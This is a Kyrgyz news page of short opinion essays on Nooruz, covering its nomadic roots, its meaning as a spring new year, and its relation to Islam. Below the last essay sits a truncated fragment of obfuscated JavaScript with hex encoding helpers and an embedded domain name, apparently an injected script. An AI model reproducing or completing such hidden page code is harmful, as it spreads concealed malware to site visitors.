НООРУЗ

Жаңы Күнгө ой-толгоо

8-1

Аалам, адам, табият – шайкештикке келген күн

Миррахим ТОКТОГУЛОВ,  КУУнун философия факультетинин аспиранты

4-Миррахим

Жазгы күн-түн теңелүү жана күзгү күн-түн теңелүү эзелтен эле салттуу коомдо белгиленип келген. Бул майрамдардын өтө руханий терең мааниси болгон.

Алгач салтуу коомдун өзүнүн түпкү дүйнөгө көз карашынын негизинде, жаратылыш менен болгон шайкеш мамилени чагылдырып келген.   Ноорузду майрамдоодо коомдук аң-сезимдин түрлөрүнүн тарыхый өнүгүшүнө жараша кошумчалар болуп келди. Акыркы түрү коомдук аң-сезимдин бири болгон Дин аркылуу бекитилип калды.

Ноорузда адам заты, табият жана аалам менен бир шайкештикке келет деп ишенишкен. Укканыма караганда, көчмөн элдер байыртадан эле күн-түн теңелүүнү белгилешип келген экен. Азыркы кезде Түндүк элдеринде (көбүнчө Сибир элдеринде) дагы белгиленген учуру кездешет. Менимче, баштапкы атынан, Нооруз деген атына өзгөргөнү менен, мазмуну алгачкы кезиндегидей эле сакталып келет. Жалпылап айтканда, Нооруз байыркы көчмөндөр тарабынан Улустун улуу күнү деген аталыш менен салттык майрам катары белгиленген. Кийинчерек отурукташкан маданиятка аралашып баштаган кезде бир топ кошумча өзгөрүүлөр кирип, азыр биз билген Нооруз түшүнүгүнө айланган. Ошондуктан, Ноорузду кыргызда Улустун улуу күнү деп салттык майрам катары кабыл алганга келишибиз керек.

Кыргыз элинин көчмөндүк жашоосуна ылайык бир гана ушул Улустун улуу күнү салттык майрам болуп эсептелет. Ал эми калган башка майрамдар сырттан диндер аркылуу же башка маданияттар аркылуу киришкен.

Нооруз күнү ойлорду тазалоого, арууланууга умтулушат

Сталбек АБДИЖАЛИЛОВ, журналист

4-Cталбек

Көчмөн эли бул майрамды кайсы убактан бери майрамдап келатканы тууралуу так маалымат жок болсо дагы, бул майрам байыркы замандардан бери жашап келатканы, көчмөн элдеринин салттык майрамы катары калыптанып калганы белгилүү.

Менин оюмча, Нооруз майрамынын биздин элдин жашоосундагы мааниси өтө эле чоң. Анткени  элибиз эзелтен табият менен, Жер эне менен дайыма байланышта болуп келген.

Дал ушу Нооруз майрамы убагында табиятка, Жер энеге жан кирип, баардык жандуулар, өсүмдүктөр кыймылга келип, жаратылыш тарабынан да аруулуктун, жаркын маанайдын нуру келип турат эмеспи. Ошон үчүн адамдар бул күндү жаңы жылдын алгачкы күнү катары санап, үй тиричиликте колдонуучу буюмдарын тазалап, ысырык жагып, алдыдагы жылга тилек кылып, ойлорун  тазалоого, арууланууга умутулушат. Бул бүгүнкү күндө дагы аткарылуучу башкы салттык майрам катары мыкты деңгээлде белгиленүүгө тийиш.

Ата-бабалар жөндөн жөн эч нерсе жасашкан эмес

Дамир КАДЫРОВ, жеке ишкер

4-Дамир

Нооруз көчмөндөрдүн толук кандуу салттык майрамы болбосо дагы, маани-маңызы жагынан 31-декабрдагы жаңы жылга караганда, жазгы жаңы жыл бизге жакыныраак деп ойлойм.

Өзгөчө көчмөндөр ушул айды, ушул мезгилди өзгөчө күтүшкөн. Себеби жаздын башталышы менен кошо жаңы жашоо тиричилиги өз жолун салган. Бул абдан маанилүү болгон. Анткени көчмөндөргө кыш мезгили бир топ ыңгайсыздыктарды алып келчү.

Нооруз же кыргыздын жаңы жыл күнүндөгү салттардын орду чоң. Аларды аткарып туруу биздин эс-тутумубузга азык берип, байыркылыгыбыз менен болгон байланышты кармап турат.  Биздин ата-бабалар жөндөн жөн эле эч нерсе жасашкан эмес. Ар бир жасап келген жөрөлгөсү өзгөчө мааниге ээ болгон. Ноорузга мен өзгөчө маани берем. Анткени ушул мезгилде баардык нерсеге жан кирип, жанданып баштагандан кийин мен дагы тазаланып, жаңы дем менен, жаңы көз караш менен жашоомо ишенимдүү кадам таштайм.

Канымдагы кыргыз салтын бийик коем

Ырысбек УЛУКБЕК уулу, журналист

4-Рысбек бабочкасы менен

Кыргыздардын басымдуу бөлүгү өзүн мусулман деп атайт. Мухаммед пайгамбарды Жараткандын элчиси катары тааныйт, Куранды ыйык деп эсептейт, Исламды эң таза дин деп кабыл алат. Ошону менен катар, кыргыздардын ошол эле көпчүлүгү кайсы мазхабды тутунганын билбейт, намазга жыгылбайт, Куранды окуган эмес, аяттарды жаттабайт.

Муну менен кыргыз эли эки жүздүү, көз көрүнө мусулман деп айтууга болбойт. Динге болгон мындай кош мамилесин кыргыздардын өзөктүк салттарынын сакталышы менен түшүндүрүү оңураак. 20 кылым сакталып келген жөрөлгө-адаттарыбызды заматта унутуп койуу мүмкүн эмес. Алардын көпчүлүгү көчмөн маданиятыбыздан калган, исламга шайкеш келбегендери арбын. Мында мен эзелтен келген салттарыбызды шариятка каршы койгум жок. Кыргыздардын өзгөчүлүгү – экөөнү тең бирдей алып кете алгандыгында. Биз бул көрүнүштү көйгөй катары эмес, жетишкендигибиз деп кабыл алышыбыз оң деген ойдомун.

Нооруз майрамынын башаты зороастризм дооруна барып такалат деп айтылып жүрөт. Фарс тилинен которгондо жылдын жаңырышын түшүндүрөт. Нооруздун байыркылыгын анын жайылышынан эле баамдаса болот – күн менен түндүн теңелишин көчмөн түрк тилдүү кыргыз, казак, татар элдеринен тартып, отурукташкан перс тилдүү тажик, оогандарга чейин майрамдашат. Демек, Нооруз бизде илгертен майрамдалып келе жатканынан шек жок. Сүмөлөк кайнатып, оюн-зоок уюштуруу салттары атадан балага мурас катары өтүп келе жатат. Мындан улам Ноорузду майрамдоо жыл сайын кулач жайып, кыргыздар чыдамсыздык менен күткөн майрам болуп баратканы белгилүү көрүнүш.

Жаздын келишин белгилөө мусулман салттарына төп келбейт. Исламда айттан башка майрам жок деген аалымдар четтен чыгат. Кыргыз элинин уулу катары жеке мен өзөктүк салттарыбызды жокко чыгарып койууга даяр эмесмин, даяр болбоймун дагы. Кыргызды кыргыз кылган анын тили, маданияты, эли. Ислам шарттаган майрамдарды тааныйм, бирок канымдагы, рухума жакын болгон кыргыздын салттарын бийигирээк койом. Тактай кетейин, шарият менен салттарыбызды каршы койбойм. Бирок кыргыздын өзөгүнө – маданиятына  шек келтирген талаптарды жокко чыгарууга туура келет. Маселен, буга чейин өз кулагым менен уккам, кыл кыяктын добушун ширк, бозону арам, Ноорузду каапырлардын майрамы деген кептерди. Айрым диний ишмерлердин Ноорузду исламга каршы койуу аракеттерин чагым деп баалоодон башка арга жок.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "kok-asaba.journalist.kg"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Комментарий кошуу

Сиздин электрондук почтаңыз жарыяланбайт. Милдеттүү талаалар белгиленген *